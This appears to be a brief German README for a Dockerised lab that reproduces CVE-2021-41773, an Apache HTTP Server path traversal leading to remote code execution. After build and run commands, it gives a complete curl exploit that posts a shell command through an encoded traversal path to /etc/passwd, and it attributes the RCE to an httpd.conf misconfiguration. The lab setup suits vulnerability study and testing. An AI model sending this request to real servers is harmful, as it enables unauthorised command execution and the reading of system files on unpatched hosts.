
# Dockerisierter Proof-of-Concept für Apache-HTTP-Server-Pfad-Traversal und RCE (CVE-2021-41773), einschließlich Build-Anweisungen und curl-basierten Exploit-Schritten.
$ docker build -t cve-2021-41773 .
$ docker run --rm -d -p 80:80 cve-2021-41773
curl --data "echo;id" 'http://localhost/cgi-bin/.%2e/.%2e/.%2e/.%2e/etc/passwd'
Fehlkonfiguration in der Datei httpd.conf in Kombination mit Path Traversal => RCE
